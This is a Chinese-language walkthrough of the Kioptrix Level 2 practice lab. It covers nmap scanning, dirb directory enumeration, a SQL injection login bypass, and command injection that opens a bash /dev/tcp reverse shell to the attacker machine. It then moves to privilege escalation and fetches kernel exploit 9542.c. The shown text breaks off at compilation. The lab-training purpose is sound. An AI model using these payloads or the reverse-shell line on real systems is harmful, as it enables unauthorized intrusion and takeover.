kioptrix level 2 靶场攻略

kioptrix level 2 

靶场攻略

第二、kioptrix level 2

2.1、主机发现和端口扫描

1、主机发现

自己修改一下：“Kioptix Level 1.vmx”

配置文件中ethernet0.networkName = "NAT"

得在导入之前修改，然后打开---》 选择复制该虚拟机

Ping扫描的方式： 

 -v 表示详细展示所以数据

 -sP 表示用 ping 形式扫描，会发ICMP回显请求。

 -sn 禁止端口扫描

Nmap不会发送ICMP回显请求或其他网络数据包。相反，它通过观察网络上的流量或响应来判断主机是否处于活动状态。这种方法可能不如发送Ping请求那样准确，但它更加隐蔽，可以在某些情况下绕过防火墙或主机配置的限制。

 -sS 表示使用 SYN 扫描。SYN 扫描是一种常见的扫描技术，它通过发送 TCP SYN 数据包来探测目标主机的端口状态,为什么能探测呢是因为 SYN 是tcp 三次握手中的第一次，SYN发过去能接收就代表对面这个端口开了。

nmap -sP  192.168.80.0/24

得出 192.168.80.131 是LEVEL-2 靶机地址。

2、端口扫描

 -p 指定扫描的端口 不指定时会扫描默认的常用的1000个端口

 -A 详细的扫描

nmap -p 1-65535 -A 192.168.80.131

端口扫描发现 22 ssh、80 http、443 https 等

2.2、目录扫描

因为端口扫描时发现有 http 80 和 ssh 22 的web的漏洞比较多先看 http

打开访问这个 80端口

做一下目录扫描吧，看看有没有敏感信息泄露

dirb 目录扫描

 -a 设置ua

 -c 设置cookie带cookie扫描

 -N 忽略某些响应码

 -o 输出结果

 -p 使用代理

 -X 在每个测试目录上附加后缀

 -z 设置毫秒延迟

一、正常扫描

dirb 目标 字典路径

没加参数 使用默认的字典，

dirb http://192.168.80.131/

扫描出一个页面

尝试sql注入， 进行拼接， ' or 1=1 # 成功，代表他没过滤。

 左边 ' 用于 将前面的闭合。or 1=1 代表 永为真。

成功 绕过

命令执行中的拼接符号，可以拼接自己想输入的命令

; bash -i >& /dev/tcp/192.168.80.128/12345 0>&1        //   ;  就是拼接的  后边bash 建立反弹shell
nc  -nlvp   12345      //  进行反弹 shell 监听，并监听 12345 端口

监听成功

权限提升

此时是apache权限 看看Linux提权，

1、看看计划任务

cat /etc/crontab

2、产看SUID提权

find / -perm -u=s -type f 2>/dev/null    // 该命令列举出有suid权限的文件
然后在网上搜怎么用suid提权，看看有没有可以利用的文件，目前没有

3、然后想到了内核提权

uname -a     // 查看内核版本

cat /etc/*release*    //查看发行版本  

4、查看到内核版本时候searchsploit 搜素得加Kernel（内核）

searchsploit Linux Kernel 2.6 Centos

搜到了 看起来 第三行的版本更匹配

searchsploit  -m   9542.c

在kali中开启一个http 服务，让控制靶机的反弹shell 自己连接到这个理消灾 9542.c 的脚本

靶机的反弹shell 开始下载脚本

gcc 编译时报错，提示要在末尾加换行。

修改完成后